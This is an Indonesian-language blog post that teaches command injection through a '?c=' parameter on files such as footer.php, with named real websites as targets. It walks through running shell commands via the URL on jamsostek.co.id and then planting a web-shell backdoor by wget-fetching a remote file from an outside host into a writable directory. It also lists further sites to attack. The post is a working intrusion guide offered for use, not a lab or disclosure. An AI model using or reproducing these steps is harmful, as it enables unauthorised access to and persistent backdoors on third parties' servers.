Posts Subscribe to InFoGauLComments

Online bookmark Bookmark

Injection Molding

Posted In | 01.51 | No Comments be the first


Baiklah saya jelasin, terlebih dahulu What is it Injection Molding
adalah sebuah proses penginjectkan sebuah site menggunakan metode command Linux. Pada url site yang mempunyai bugs Molding. akan saya kasih beberapa bugsnya yaitu.

Quote:Bugs : footer.php, /images/index.php, COPYRIGHT.php, ver.php, bigdump.php 
exploit : ?c=
else command Linux/web shell : 
http://cyprus-bargains.net/config/.web-shell.txt
wget http://cyprus-bargains.net/config/.cmd.txt -O view_index.php
bagaimana cara menemukan website yang berbugs Molding ini.
kalian harus mencobanya sendiri dan akan tau sendiri.

baiklah ini akan kita coba pada site !

[FONT="Tahoma"][SIZE="5"]http://www.jamsostek.co.id[/SIZE][/FONT]

kita coba :)

1.
Quote:http://www.jamsostek.co.id/footer.php
http://img100.imageshack.us/img100/2400/41923668.jpg

Quote:Forbidden
You don't have permission to access /images/ on this server.

Apache/1.3.33 Server at btic.biotrop.org Port 80

ok keterangan disana adalah, kita tidak dapat mengaccess footer.php dan coba access /images/. itu lah yang akan kita manfaatkan dari pengalihan ini.

2. lalu kita masukan xpl dan command linuxnya

Quote:http://img51.imageshack.us/img51/2879/44485200.jpg
http://www.jamsostek.co.id/footer.php?c=ls -laF
3. lalu kita akan masuk ke di directory yang readable kita lihat disana terdapat yaitu directory.
Quote:drwxrwxrwx 5 root nobody 7168 Nov 5 17:33 content_file/
nah bagaimana cara masuk ke directory content_file

4. dengan cara, kita lihat dulu menggunakan
Quote:http://img593.imageshack.us/img593/4047/74386478.jpg
command: pwd
http://www.jamsostek.co.id/footer.php?c=pwd
Hasilnya: /portal/jmsportal
untuk melihat isi dari directory content_file

5. Lalu dari command pwd kita gunakan perintah untuk bisa masuk ke content_file tersebut.
Quote:http://img638.imageshack.us/img638/3500/63064329.jpg
command: cd /portal/jmsportal/content_file;ls -laF
http://www.jamsostek.co.id/footer.php?c=...le;ls -laF

6. selanjutnya pemananman backdoor karena directory content_file adalah directory readable jadi kita akan memasukan backdoor di directory ini.

Quote:http://img152.imageshack.us/img152/3096/48918205.jpg
Command: cd /portal/jmsportal/content_file;wget http://cyprus-bargains.net/config/.cmd.txt -O view_index.php

Lalu buka sesuai dimana kalian menanam backdoornya pasti di directory content_file
Code: (Select All)
http://www.jamsostek.co.id/content_file/view_index.php

Silahkan kalian berimajinasi sendiri kalau yang menggunakan windows dan browser kalian mozilla silahkan kalian coba CTRL + T =http://www.google.com

examples: 
http://www.easydietclinic.com
http://btic.biotrop.org

sekian salam ./me :)

Authorimage

Ditulis Oleh : ExoVeVo
Pada : Sabtu, 23 November 2013
Jam : 01.51
Kategori:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 

Follows

Banners Footer

Site Info

My Facebook
SEO Reports for exo-vevo.blogspot.com DMCA.com